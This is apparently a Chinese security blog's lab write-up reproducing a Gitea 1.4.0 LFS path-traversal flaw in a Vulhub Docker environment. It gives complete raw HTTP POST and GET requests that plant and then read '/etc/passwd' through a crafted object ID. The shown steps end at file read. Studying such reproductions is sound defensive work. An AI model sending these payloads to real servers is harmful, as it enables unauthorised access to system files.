Gitea 1.4 未授權遠程代碼執行
一、漏洞描述
Gitea是從gogs衍生出的一個開源項目,是一個類似於Github、Gitlab的多用戶Git倉庫管理平台。其1.4.0版本中有一處邏輯錯誤,導致未授權用戶可以穿越目錄,讀寫任意文件,最終導致執行任意命令。
二、影響版本
1.4.0
三、環境准備&&漏洞復現
Vulhub進行搭建
https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce安裝鏡像docker-compose up -d
環境啟動成功
初始化配置:
http://192.168.1.108:3000/install
其他默認設置一下管理員賬戶密碼:
初始化完成成功進去面板
安裝完成后,新建一個用戶,然后創建一個公開的倉庫
創建一個公開的倉庫
倉庫創見成功
需要重啟一下重啟gitea服務
docker-compose restart
漏洞驗證:
具體數據包:
POST/lostworld/getpasswd.git/info/lfs/objectsHTTP/1.1Host: 192.168.1.108:3000Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: application/vnd.git-lfs+jsonAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: lang=zh-CN; i_like_gitea=7b3a3994aeff5ed0; _csrf=lA-gqD5gapHJeeQEz_XUOsejTSY6MTYwOTk4NzQ3MTAwNDc0MzE3OQ%3D%3DConnection: closeContent-Length: 153{"Oid":"....../../../etc/passwd","Size":1000000,"User":"a","Password":"a","Repo":"a","Authorization":"a"}
出現401說明發送數據包LFS對象已經創建成功,且其Oid為....../../../etc/passwd。
訪問路徑
http://192.168.1.108:3000/admins/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth
具體讀取數據包
GET/lostworld/getpasswd.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sthHTTP/1.1Host: 192.168.1.108:3000Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: lang=zh-CN; i_like_gitea=19fae7187e6a86e2; _csrf=y0uGd4qsOuq8esEW9S4hXHWRGHo6MTYwOTk4ODAwNzczODc4NzI3MQ%3D%3DConnection: close
參考:
https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce
https://mp.weixin.qq.com/s/vsQsATBNbOkyVmTgm-zU2w
免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!
轉載聲明:著作權歸作者所有。商業轉載請聯系作者獲得授權,非商業轉載請注明出處。
訂閱查看更多復現文章、學習筆記
thelostworld
安全路上,與你並肩前行!!!!
個人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
個人簡書:https://www.jianshu.com/u/bf0e38a8d400
個人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
個人博客園:https://www.cnblogs.com/thelostworld/
FREEBUF主頁:https://www.freebuf.com/author/thelostworld?type=article
歡迎添加本公眾號作者微信交流,添加時備注一下“公眾號”
2021近期往期內容:
MinIO未授權SSRF漏洞(CVE-2021-21287)
Apache Druid 命令執行漏洞(CVE-2021-25646)復現
Linux sudo權限提升漏洞(CVE-2021-3156)復現
CVE-2021-3129-Laravel Debug mode 遠程代碼執行漏洞